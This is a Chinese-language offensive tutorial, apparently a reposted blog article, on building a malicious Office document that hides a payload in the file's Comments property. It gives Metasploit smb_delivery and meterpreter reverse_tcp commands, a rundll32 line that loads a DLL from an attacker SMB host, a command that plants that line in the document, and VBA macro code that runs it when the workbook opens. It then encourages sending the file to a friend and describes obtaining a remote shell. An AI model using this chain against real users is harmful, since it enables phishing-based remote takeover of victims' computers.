0x00
Microsoft Office相信大家都用过。Office在文档中嵌入对象极大的方便了我们的日常使用,但同时也为我们带来了众多安全问题。可以说,Office文档为攻击者提供了各种方法来诱骗受害者运行任意代码。当然,攻击者也可能会尝试利用Office漏洞,但更常见的情况是,攻击者会向受害者发送包含恶意宏或嵌入式(Packager)可执行文件的Office文档。
在本文中,我将向大家介绍一种apt常用的攻击手法,利用Office文档属性执行payload
0x01
首先在msf执行以下代码,设置我们攻击的payload
use exploit/windows/smb/smb_deliveryset PAYLOAD windows/meterpreter/reverse_tcp
生成payload
rundll32.exe \\192.168.65.130\Npxy\test.dll,0利用这个项目将payload植入文档属性中
Invoke-Commentator -OfficeFile .\test.xlsx -Comment "rundll32.exe \\192.168.65.130\Npxy\test.dll,0" The new file with added comment has been written to .\test-wlc.xlsx.如图:
将payload 植入文档中的注释部分
我们来看看新建的文档的属性,可以看到我们刚才的payload成功植入
0x02
要想成功将属性的代码执行,我们还要添加一个宏代码将恶意代码执行
为文档添加一个宏,将以下代码粘贴
Sub Workbook_Open()Dim p As DocumentPropertyFor Each p In ActiveWorkbook.BuiltinDocumentPropertiesIf p.Name = "Comments" ThenShell (p.Value)End IfNextEnd Sub
除了这里使用的xlsx文件,你也可以使用Word,PowerPoint,在这里给出代码
Word
Dim prop As DocumentPropertyFor Each prop In ActiveDocument.BuiltInDocumentPropertiesIf prop.Name = "Comments" ThenMsgBox prop.ValueEnd IfNext
Excel
Dim prop As DocumentPropertyFor Each prop In ActiveWorkbook.BuiltinDocumentPropertiesIf prop.Name = "Comments" ThenMsgBox prop.ValueEnd IfNext
PowerPoint
Dim prop As DocumentPropertyFor Each prop In ActivePresentation.BuiltInDocumentPropertiesIf prop.Name = "Comments" ThenMsgBox prop.ValueEnd IfNext
为了通过Workbook_Open()函数利用自动执行,需要将武器化的MS Excel文档降级为Office 98 - 2003兼容性(.xls)
这样一个完整的恶意office文档就完成了,发给小伙伴试试
0x03
小伙伴收到文件,双击打开,提示要启动宏才可以,于是点开了启用宏.....
然后,我们就可以收到小伙伴电脑的shell了
本文只是简单介绍方法、抛砖引玉,当然还有很多可以优化改进的地方,大家可再完善。
相关实验:
Microsoft_PowerPoint宏攻击(扫码学习)
http://www.hetianlab.com/expc.do?ec=ECID172.19.104.182016011817104100001
如有侵权请联系:admin#unsafe.sh